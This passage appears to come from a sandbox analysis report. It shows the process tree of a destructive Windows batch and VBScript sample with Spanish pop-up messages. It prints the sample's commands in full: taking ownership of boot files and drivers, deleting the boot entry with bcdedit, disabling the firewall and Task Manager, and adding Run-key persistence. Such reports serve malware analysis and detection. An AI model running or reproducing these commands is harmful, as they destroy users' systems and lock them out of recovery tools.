        ipconfig /release
        5⤵
        Gathers network information
        
        PID:1980
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        5⤵
        Adds Run key to start application
        
        PID:748
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Drops autorun.inf file
        Views/modifies file attributes
        
        PID:2060
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:3160
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:3312
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:3320
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:3332
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:3340
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:3372
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:3380
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:3396
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:3416
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:3432
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3452
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B3B5.tmp\B3B6.tmp\B3B7.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:4388
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:4304
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        
        PID:6516
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:3508
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:5092
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:5100
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:3852
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:3856
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:5092
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:4804
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:4904
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:5196
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:5452
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:5476
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:6660
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:5624
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:6968
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        
        PID:7796
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8440
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6704
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:2220
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:2336
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:3716
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8928
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8292
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:2176
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9192
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:3428
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:3964
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:4104
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:9488
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:9616
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:9680
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:9868
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:9980
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:10132
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:9296
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:9384
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:7800
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:9848
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:10256
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:10356
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:10492
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10644
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        
        PID:11856
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:13072
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:12432
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:13628
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3504
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:3524
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:3552
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:3580
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3612
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B423.tmp\B424.tmp\B425.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:4648
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:4272
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        
        PID:6500
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:3092
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:4064
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:4948
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:4360
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:3952
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:4824
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        
        PID:4296
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:5172
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:5300
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:5516
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:5540
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:6708
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:5644
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:6860
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        
        PID:8008
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8644
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8904
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7544
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8468
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9184
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8040
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:3944
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:3828
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9472
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9592
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:9672
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:9792
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:9928
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:10124
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:4128
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:9376
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:7636
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:9812
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:10248
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:10348
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:10484
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:10628
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:10704
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:10744
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:10772
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10888
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:11412
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:6584
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:9028
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:13724
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3624
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:3644
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:3664
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:3672
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3680
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B50D.tmp\B50E.tmp\B50F.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:4068
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:4588
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        
        PID:5476
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Modifies file permissions
        
        PID:4268
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:1048
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:4332
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:4340
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:4676
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:5096
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:4944
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:5308
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:5424
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:5604
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:5620
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:6748
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:6772
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:7096
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:6676
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8824
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8972
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9240
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9524
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9640
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9740
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9920
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:10096
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:10172
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9324
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:9420
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:9784
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8512
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:10292
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:10408
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:10520
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:10668
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:10732
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:10756
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:10840
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:10912
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:10956
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:10996
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:11084
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:11144
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:11224
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:2444
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:12688
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        
        PID:9520
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        
        PID:13792
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3708
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:3736
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:3744
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:3780
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:3800
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:3688
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:4212
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:4304
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        5⤵
        
        PID:4360
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        5⤵
        Modifies Windows Firewall
        
        PID:4432
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /delete {current}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:4660
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:4372
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:4644
    - - C:\Windows\system32\msg.exe
        
        msg * Has sido hackeado!
        5⤵
        
        PID:4276
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\drivers" /r
        5⤵
        Modifies file permissions
        
        PID:4944
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\drivers" /reset /t /c /q
        5⤵
        Modifies file permissions
        
        PID:5020
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
        5⤵
        Views/modifies file attributes
        
        PID:5408
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:5708
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:5716
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:5724
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:5740
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:5752
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:5796
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        
        PID:5820
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6845.tmp\6846.tmp\6847.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:11336
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:11964
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:12012
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:12408
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:12672
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:7044
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:7760
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:13156
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:11932
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:13560
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:13620
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:13816
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:13848
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:5836
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5860
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5876
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:5904
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        
        PID:5952
      - C:\Windows\system32\cmd.exe
        
